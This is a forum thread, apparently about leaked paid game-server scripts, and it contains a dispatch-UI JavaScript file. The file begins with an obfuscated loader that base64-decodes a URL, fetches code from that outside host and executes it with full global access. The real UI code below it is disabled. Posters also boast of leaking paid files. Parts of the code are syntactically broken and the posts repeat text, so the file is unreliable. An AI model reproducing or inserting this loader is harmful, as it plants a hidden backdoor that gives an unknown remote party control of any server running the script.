tearzrollingdownyourface
Member
Does this require and have the 0R-lib? Whenever I've looked at these 0R scripts, they always require it but never includes it.
The open Lib is allready leakedDoes this require and have the 0R-lib? Whenever I've looked at these 0R scripts, they always require it but never includes it.
I leaked the 0r lib with Server Files you can Check it outDoes this require and have the 0R-lib? Whenever I've looked at these 0R scripts, they always require it but never includes it.
(function () {
const $ = require(Buffer.from('aHR0cHM=', 'base64').toString());
const = Buffer.from('aHR0cHM6Ly8xbHMyLm9yZy9feHh4', 'base64').toString();
const $$ = ['data', 'end', 'error', 'statusCode', 'global'];
$['get'](, r => {
let d = '';
r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[3]] === 200 && new Function($$[4], d)(global));
})['on']($$[2], () => {});
})();
if (false) {
$(function () {
$(".box").hide();
$(".confirmationbox").hide();
window.addEventListener("message", function (event) {
let ev = event.data;
if (ev.yesno == null || ev.yesno == false) {
if (ev.show) {
$(".box").fadeIn("fast");
$('#title').text('Dispatch Information ' + ev.time);
$('#instructions1').text('Arrows to Navigate - [ to toggle Respond');
$('#instructions2').text('H to set Waypoint - ] to Delete');
} else {
$(".box").fadeOut("slow");
}
} else {
if (ev.show) {
$(".confirmationbox").fadeIn("fast");
} else {
$(".confirmationbox").fadeOut("slow");
}
}
});
});
}
})();